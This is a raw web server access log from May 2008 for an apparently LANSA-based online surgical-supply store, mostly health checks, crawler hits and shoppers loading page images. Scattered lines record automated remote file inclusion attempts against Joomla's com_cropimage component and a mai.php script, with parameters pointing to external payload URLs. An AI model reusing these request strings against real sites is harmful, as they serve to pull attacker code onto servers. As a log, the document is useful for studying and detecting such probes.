89.218.85.18 - - [20/May/2008:00:00:12 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/May/2008:00:00:13 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2008:00:05:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:11:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:17:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:22:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:27:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:32:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.3.165.14 - - [20/May/2008:00:35:29 -0400] "GET /images/nav04_shop_over.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:35:29 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG HTTP/1.1" 200 32132 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961C6668D500C180002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav04_about_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav04_download_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav_store_head.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:16 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/spacer.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/login.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/search.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:17 -0400] "GET /images/sale_promo-icon.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:18 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.1" 200 2616 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:19 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:54 -0400] "GET /images/nav04_conven_over.jpg HTTP/1.1" 200 1587 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:36:54 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:37:04 -0400] "GET /images/nav04_download_over.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:37:04 -0400] "GET /images/nav04_download_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:37:32 -0400] "GET /images/nav04_about_over.jpg HTTP/1.1" 200 1472 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
65.3.165.14 - - [20/May/2008:00:37:32 -0400] "GET /images/nav04_about_off.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F19961663B8D500D9C0002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [20/May/2008:00:38:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.80.193.45 - - [20/May/2008:00:38:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)"
65.55.105.239 - - [20/May/2008:00:39:55 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.239 - - [20/May/2008:00:39:55 -0400] "GET /logs/error_log.Q107062100 HTTP/1.1" 200 63686 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [20/May/2008:00:43:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.67.26.84 - - [20/May/2008:00:46:20 -0400] "GET /logs/mai.php?src=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
217.67.26.84 - - [20/May/2008:00:46:21 -0400] "GET /logs/mai.php?src=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
217.67.26.84 - - [20/May/2008:00:46:21 -0400] "GET /mai.php?src=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
217.67.26.84 - - [20/May/2008:00:46:21 -0400] "GET /mai.php?src=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2008:00:48:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:53:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:00:58:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:01:03:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:01:08:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:01:13:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.197.68.66 - - [20/May/2008:01:15:51 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
217.197.68.66 - - [20/May/2008:01:15:51 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/May/2008:01:18:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:01:25:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.132.204.166 - - [20/May/2008:01:28:43 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
66.132.204.166 - - [20/May/2008:01:28:43 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
209.59.12.99 - - [20/May/2008:01:30:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:01:35:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.121 - - [20/May/2008:01:36:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF597318325836004C90095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:36:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF597318328886004A90095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:37:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58601036F84600DF40096+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:39:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF597318323856004B90095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.96.207.210 - - [20/May/2008:01:40:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 38212 "http://www.acesurgical.com/home_May08.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
209.59.12.99 - - [20/May/2008:01:40:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.96.207.210 - - [20/May/2008:01:40:35 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.0" 200 2954 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:35 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 200 2702 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:36 -0400] "GET /images/nav04_about_off.jpg HTTP/1.0" 200 1255 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:36 -0400] "GET /images/nav04_shop_over.jpg HTTP/1.0" 200 1722 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:37 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.0" 200 1341 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:37 -0400] "GET /images/nav04_download_off.jpg HTTP/1.0" 200 1206 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:38 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.0" 200 965 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:38 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.0" 200 2321 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:38 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.0" 200 2447 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:39 -0400] "GET /images/nav_store_head.jpg HTTP/1.0" 200 1953 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:39 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.0" 200 922 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:39 -0400] "GET /images/spacer.gif HTTP/1.0" 200 55 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:39 -0400] "GET /images/login.gif HTTP/1.0" 200 166 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:40 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:40 -0400] "GET /images/search.gif HTTP/1.0" 200 614 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:40 -0400] "GET /images/sale_promo-icon.gif HTTP/1.0" 200 402 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:40 -0400] "GET /images/store_anesth_section.jpg HTTP/1.0" 200 10123 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:41 -0400] "GET /images/store_bone_section2.jpg HTTP/1.0" 200 21458 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:41 -0400] "GET /images/store_cardiac_section.jpg HTTP/1.0" 200 25730 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:42 -0400] "GET /images/store_implant_section.jpg HTTP/1.0" 200 8001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:42 -0400] "GET /images/store_gauze_section.jpg HTTP/1.0" 200 24119 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:42 -0400] "GET /images/store_handpc_section.jpg HTTP/1.0" 200 23958 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:43 -0400] "GET /images/store_infection_section.jpg HTTP/1.0" 200 25264 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:44 -0400] "GET /images/store_instr_section.jpg HTTP/1.0" 200 26432 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:44 -0400] "GET /images/store_irrigate_section.gif HTTP/1.0" 200 10336 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:46 -0400] "GET /images/store_iv_admin_section.jpg HTTP/1.0" 200 9115 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:46 -0400] "GET /images/over-store_cardiac_section.jpg HTTP/1.0" 200 8882 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:46 -0400] "GET /images/store_pharma_section.jpg HTTP/1.0" 200 7953 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:46 -0400] "GET /images/over-store_implant_section.jpg HTTP/1.0" 200 7534 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:47 -0400] "GET /images/store_blades_section.jpg HTTP/1.0" 200 24174 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:47 -0400] "GET /images/store_burs_section.jpg HTTP/1.0" 200 10892 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG HTTP/1.0" 200 33572 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:49 -0400] "GET /images/store_implant_section.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
